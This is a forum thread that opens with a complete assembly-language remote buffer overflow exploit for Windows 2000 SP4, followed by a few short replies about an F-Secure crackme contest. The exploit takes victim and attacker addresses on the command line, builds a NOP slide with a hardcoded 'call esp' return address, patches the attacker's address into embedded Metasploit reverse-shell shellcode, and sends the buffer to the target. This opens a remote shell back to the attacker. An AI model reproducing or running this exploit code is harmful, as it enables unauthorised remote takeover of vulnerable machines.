    EXTERN socket
    IMPORT socket Ws2_32.dll
    EXTERN htons
    IMPORT htons Ws2_32.dll
    EXTERN inet_addr
    IMPORT inet_addr Ws2_32.dll
    EXTERN closesocket
    IMPORT closesocket Ws2_32.dll
    EXTERN WSACleanup
    IMPORT WSACleanup Ws2_32.dll
    EXTERN connect
    IMPORT connect Ws2_32.dll
    EXTERN send
    IMPORT send Ws2_32.dll
    EXTERN recv
    IMPORT recv Ws2_32.dll
    EXTERN strtol
    IMPORT strtol Msvcrt.dll
    EXTERN memcpy
    IMPORT memcpy Msvcrt.dll


    ;400 bytes on 32-bit Windows: the C compiler pads before lpVendorInfo
    STRUC WSADATA
    wVersion resw 1
    wHighVersion resw 1
    szDescription resb 256+1
    szSystemStatus resb 128+1
    iMaxSockets resw 1
    iMaxUdpDg resw 1
    resb 2
    lpVendorInfo resd 1
    ENDSTRUC

    STRUC SOCKADDR_IN
    sin_family resw 1
    sin_port resw 1
    sin_addr resb 4
    sin_zero resb 8
    ENDSTRUC



    segment .data USE32

    CR equ 0Dh
    LF equ 0Ah


    msginitialized db "Winsock initialized...",CR,LF,0
    msgconnected db "Connection successful...",CR,LF,0
    msgconnectionfailed db "Connection failed...",CR,LF,0
    msgshellcodesent db "Shellcode sent...",CR,LF,0
    msgsocketclosed db "Socket closed...",CR,LF,0
    msgcleanedup db "",CR,LF,0
    fmtbanner db "%s",CR,LF,0 ;received data is printed through this, never as the format string



    errCreateSock db "could not create socket.",CR,LF,0
    errConnect db "could not connect.",CR,LF,0
    errSend db "failed to send data.",CR,LF,0
    errRead db "socket error while receiving.",CR,LF,0
    errStartup db "startup failed!",CR,LF,0
    errVersion db "required version not supported!",CR,LF,0
    errCleanup db "cleanup failed!",CR,LF,0


    strlogo db " ",CR,LF,CR,LF
    db " (Remote buffer overflow exploit)",CR,LF
    db "[conceited@live.com]",CR,LF,CR,LF
    db "Usage: buff <victimip> <port> <attackerip> <port>",CR,LF
    db "Example:",CR,LF
    db "buff.exe 142.143.112.12 1111 192.168.1.2 2222",CR,LF
    db CR,LF,0



    retaddr db 0bbh,0edh,04fh,07ch ;7c4fedbb - call esp, Win 2k SP4

    ;Metasploit win32_reverse shellcode, 287 bytes, not encoded. The connect-back
    ;IP (4 bytes after the push at offset 159) and port (2 bytes after the push word
    ;at offset 164) are placeholders, patched from the command line before sending.
    IPOFFSET equ 160
    PORTOFFSET equ 166
    SHELLCODELEN equ 287
    shellcode db 0fch,06ah,0ebh,04dh,0e8h,0f9h,0ffh,0ffh,0ffh,060h,08bh,06ch,024h,024h,08bh,045h
    db 03ch,08bh,07ch,005h,078h,001h,0efh,08bh,04fh,018h,08bh,05fh,020h,001h,0ebh,049h
    db 08bh,034h,08bh,001h,0eeh,031h,0c0h,099h,0ach,084h,0c0h,074h,007h,0c1h,0cah,00dh ;84 c0 = test al,al ends the API hash loop
    db 001h,0c2h,0ebh,0f4h,03bh,054h,024h,028h,075h,0e5h,08bh,05fh,024h,001h,0ebh,066h
    db 08bh,00ch,04bh,08bh,05fh,01ch,001h,0ebh,003h,02ch,08bh,089h,06ch,024h,01ch,061h
    db 0c3h,031h,0dbh,064h,08bh,043h,030h,08bh,040h,00ch,08bh,070h,01ch,0adh,08bh,040h
    db 008h,05eh,068h,08eh,04eh,00eh,0ech,050h,0ffh,0d6h,066h,053h,066h,068h,033h,032h
    db 068h,077h,073h,032h,05fh,054h,0ffh,0d0h,068h,0cbh,0edh,0fch,03bh,050h,0ffh,0d6h
    db 05fh,089h,0e5h,066h,081h,0edh,008h,002h,055h,06ah,002h,0ffh,0d0h,068h,0d9h,009h
    db 0f5h,0adh,057h,0ffh,0d6h,053h,053h,053h,053h,043h,053h,043h,053h,0ffh,0d0h,068h ;push dword <ip>
    db 01eh,01eh,01eh,01eh ;ip placeholder, offset 160
    db 066h,068h ;push word <port>
    db 015h,0b3h ;port placeholder, offset 166
    db 066h,053h,089h,0e1h,095h,068h,0ech,0f9h
    db 0aah,060h,057h,0ffh,0d6h,06ah,010h,051h,055h,0ffh,0d0h,066h,06ah,064h,066h,068h
    db 063h,06dh,06ah,050h,059h,029h,0cch,089h,0e7h,06ah,044h,089h,0e2h,031h,0c0h,0f3h
    db 0aah,095h,089h,0fdh,0feh,042h,02dh,0feh,042h,02ch,08dh,07ah,038h,0abh,0abh,0abh
    db 068h,072h,0feh,0b3h,016h,0ffh,075h,028h,0ffh,0d6h,05bh,057h,052h,051h,051h,051h
    db 06ah,001h,051h,051h,055h,051h,0ffh,0d0h,068h,0adh,0d9h,005h,0ceh,053h,0ffh,0d6h
    db 06ah,0ffh,0ffh,037h,0ffh,0d0h,068h,0e7h,079h,0c6h,079h,0ffh,075h,004h,0ffh,0d6h
    db 0ffh,077h,0fch,0ffh,0d0h,068h,0f0h,08ah,004h,05fh,053h,0ffh,0d6h,0ffh,0d0h

    ;NOP filler the payload is assembled in: 524 bytes of slide, the return
    ;address at 524, the shellcode at 528; the rest stays 90h
    junk times 1024 db 090h



    segment .bss USE32


    hSocket resd 1
    temprecvbuff resb 512
    argc resd 1
    argv resd 1
    env resd 1
    startinfo resd 1 ;_startupinfo for __getmainargs, newmode = 0
    srcip resd 1 ;pointers into argv
    dstip resd 1
    srcport resd 1
    dstport resd 1
    wsaData resb WSADATA_size ;the structures themselves, not pointers to them
    sockAddr resb SOCKADDR_IN_size



    segment .code USE32

    ..start

    jmp start

    _errormsg:
    push dword ecx
    call[printf]
    add esp,4
    jmp _finished


    ;
    ;startup code
    ;
    start:
    push dword startinfo
    push dword 0
    push dword env
    push dword argv
    push dword argc
    call[__getmainargs] ;cdecl, five arguments
    add esp,20
    cmp dword[argc],5
    je sortinput


    ;
    ;print example
    ;

    example:
    push dword strlogo
    call[printf]
    add esp,4
    jmp _finished


    ;
    ;sort and store ip port etc for later
    ;

    sortinput:
    mov esi,[argv]

    ;get targetip
    mov edi,[esi+4]
    mov [dstip],edi

    ;get targetport
    mov edi,[esi+8]
    mov [dstport],edi

    ;get localip
    mov edi,[esi+12]
    mov [srcip],edi

    ;get localport
    mov edi,[esi+16]
    mov [srcport],edi

    ;
    ;initialize the winsock library (stdcall: the callee removes the arguments)
    ;

    push dword wsaData
    push dword 0202h ;version 2.2
    call [WSAStartup]
    test eax,eax
    jz _sockversion
    mov ecx,errStartup
    jmp _errormsg

    ;
    ;check winsock version
    ;

    _sockversion:
    cmp byte[wsaData+wVersion],2
    jae __createsocket
    mov ecx,errVersion
    jmp _errormsg

    ;
    ;Create a socket
    ;

    __createsocket:
    push dword IPPROTO_TCP
    push dword SOCK_STREAM
    push dword AF_INET
    call [socket]
    mov [hSocket],eax
    cmp eax, INVALID_SOCKET
    jne _sockets_created
    mov ecx,errCreateSock
    jmp _errormsg

    ;
    ;fill in ip+port info before we connect
    ;

    _sockets_created:
    push dword msginitialized
    call[printf]
    add esp,4

    mov word[sockAddr+sin_family],AF_INET

    push dword 10
    push dword 0
    push dword [dstport]
    call[strtol]
    add esp,12
    push eax
    call[htons]
    mov [sockAddr+sin_port],ax

    push dword[dstip]
    call [inet_addr]
    mov [sockAddr+sin_addr],eax

    ;
    ;Connect to the server
    ;

    push dword SOCKADDR_IN_size
    push dword sockAddr
    push dword [hSocket]
    call[connect]
    test eax,eax
    jz _getsomedata
    mov ecx,errConnect
    jmp _errormsg

    ;
    ;receive the banner (one byte kept back for the terminating zero)
    ;

    _getsomedata:

    push dword msgconnected
    call[printf]
    add esp,4

    push dword 0
    push dword 511
    push dword temprecvbuff
    push dword[hSocket]
    call [recv]
    cmp eax,SOCKET_ERROR
    jne _displaydata
    mov ecx,errRead
    jmp _errormsg

    ;
    ;display the received data
    ;

    _displaydata:
    mov byte[temprecvbuff+eax],0
    push dword temprecvbuff
    push dword fmtbanner
    call[printf]
    add esp,8

    ;
    ;patch our ip (inet_addr gives network order) and port (htons) into the shellcode
    ;

    push dword[srcip]
    call [inet_addr]
    mov [shellcode+IPOFFSET],eax

    push dword 10
    push dword 0
    push dword [srcport]
    call[strtol]
    add esp,12
    push eax
    call[htons]
    mov [shellcode+PORTOFFSET],ax

    ;
    ;add together junk+rtnadd+shellcode
    ;

    push dword 4
    push dword retaddr
    push dword junk+524
    call[memcpy]
    add esp,12

    push dword SHELLCODELEN
    push dword shellcode
    push dword junk+528
    call[memcpy]
    add esp,12

    ;
    ;send shellcode
    ;

    _sendshellcode:
    push dword 0
    push dword 1024
    push dword junk
    push dword[hSocket]
    call [send]

    cmp eax,SOCKET_ERROR
    jne _cleanup
    mov ecx,errSend
    jmp _errormsg

    ;
    ;close connection and clean up
    ;

    _cleanup:
    push dword msgshellcodesent
    call[printf]
    add esp,4

    push dword[hSocket]
    call[closesocket]

    push dword msgsocketclosed
    call[printf]
    add esp,4

    call[WSACleanup]

    _finished:
    push dword 0
    call[ExitProcess]
    [/PHP]


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Looking forward to your one joe.

    Didn't do anything I'm afraid.. but I'll try to do something during the week.

    I was playing with the F-Secure challenge this weekend.
    (would have mentioned it but only found out about it myself yesterday morning)

    Check them out; the first one is easy enough, the second can be solved in 2 ways, but I've not solved it yet.

    Well, it requires brute force of a modified md5 hash, but I didn't know this and ran a normal md5 brute force attack for almost a day, testing ~500 million keys a second.. now the competition is over, but still good crackmes.

    Wish I had known about this contest earlier, but no doubt it'll be on again next year (this is the third year now)


  • Closed Accounts Posts: 3 Byte22


    Would love to get into this stuff :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I don't think there is enough interest for it here.

